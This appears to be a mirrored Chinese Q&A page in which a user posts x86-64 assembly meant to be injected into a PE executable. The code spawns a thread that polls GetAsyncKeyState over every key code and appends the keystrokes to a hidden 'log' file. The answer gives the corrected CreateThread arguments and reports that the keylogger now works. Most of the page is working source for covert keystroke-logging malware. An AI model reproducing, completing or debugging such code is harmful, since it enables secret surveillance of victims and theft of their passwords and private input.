为什么CreateThread不工作?

时间:2017-03-19 09:54:29

标签: x86-64 createthread

我试图在PE文件中注入此代码以使用CreateThread运行我的程序以在PE文件中运行键盘记录器,但CreateThread失败并出现3E6h ERROR_NOACCESS错误。 我在下面的源代码中的错误在哪里?

procedure:
sub rsp, 28h            
and rsp, 0fffffffffffffff0h     
lea rdx,[loadlibrary7]
lea rcx,[kernel32dll]
call MyGetProcAddress                

lea rcx, [user32dll]
call rax                


lea rdx, [createthread7]
lea rcx, [kernel32dll]
call MyGetProcAddress         
lea rbx,[pThread]                                                                                                    ;     

lea rbx,[ThreadId]
mov qword[rsp+20h], rbx
lea r9,[Par]
lea r8,[KL]
xor rdx,rdx
lea rcx,[SECURITY_ATTRIBUTES_]
call rax


add rsp, 28h            
db 0                    ;JMP PARA OEP
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0


proc KL
REPS:
lea rdx,[loadlibrary7]
lea rcx,[kernel32dll]
call MyGetProcAddress                

lea rcx, [user32dll]
call rax                

lea rdx, [getasync]
lea rcx, [user32dll]
call MyGetProcAddress         
MOV [GETKEYS],RAX

Label001:
mov [VIRTUAL_KEY_CODE],8
L0:
cmp [VIRTUAL_KEY_CODE],255
ja La1
mov rcx,[VIRTUAL_KEY_CODE]
MOV RAX,[GETKEYS]
call rax
cmp eax,-32767
MOV RAX,[GETKEYS]
jz Label1
inc [VIRTUAL_KEY_CODE]
jmp L0
La1:
mov [VIRTUAL_KEY_CODE],8
jmp Label001
Label1:

lea rdx,[loadlibrary7]
lea rcx,[kernel32dll]
call MyGetProcAddress         


lea rcx, [msvcrtdll]
call rax                


lea rdx, [fopen7]
lea rcx,[msvcrtdll]
call MyGetProcAddress                     

lea r8, [filemode]
lea rdx, [file_name]
lea rcx,[fp]
call rax                ;TO LOG KEYSTROKES

lea rdx, [fwrite7]
lea rcx,[msvcrtdll]
call MyGetProcAddress         


mov r9,[fp]
mov r8,1
mov rdx,1
lea rcx, [VIRTUAL_KEY_CODE]
call rax                ;TO LOG KEYSTROKES

lea rdx, [fclose7]
lea rcx,[msvcrtdll]
call MyGetProcAddress         

mov rcx,[fp]
call rax

jmp REPS
endp

proc MyGetProcAddress
...
ret
endp
kernel32dll            db  'KERNEL32.DLL', 0
loadlibrary7            db  'loadlibraryA', 0
user32dll              db  'USER32.DLL', 0
createthread7       db  'CreateThread', 0
msvcrtdll              db  'MSVCRT.DLL', 0
getasync                db  'GetAsyncKeyState', 0
fopen7              db  'fopen_s', 0
fwrite7             db  'fwrite',0
fclose7             db  'fclose',0
exitproc7           db  'ExitProcess', 0
filemode                db   'a',0
file_name               db   'log',0
pThread                 dq   0
struct SECURITY_ATTRIBUTES
A dd 0
B dq 0
C dd 0
ends
SECURITY_ATTRIBUTES_ SECURITY_ATTRIBUTES
GEYKEYS                 dq   0
VIRTUAL_KEY_CODE        dq   0
fp                      dq   0
Par                     dq   0
...

1 个答案:

答案 0 :(得分:0)

我已初始化我的来源:

mov qword[rsp+20h], 0
lea rbx,[ThreadId]
mov qword[rsp+28h], rbx
lea r9,[Par]
lea r8,[KL]
xor rdx,rdx
lea rcx,[SECURITY_ATTRIBUTES_]
call rax

现在我的键盘记录器工作正常。谢谢你的帮助。

相关问题
最新问题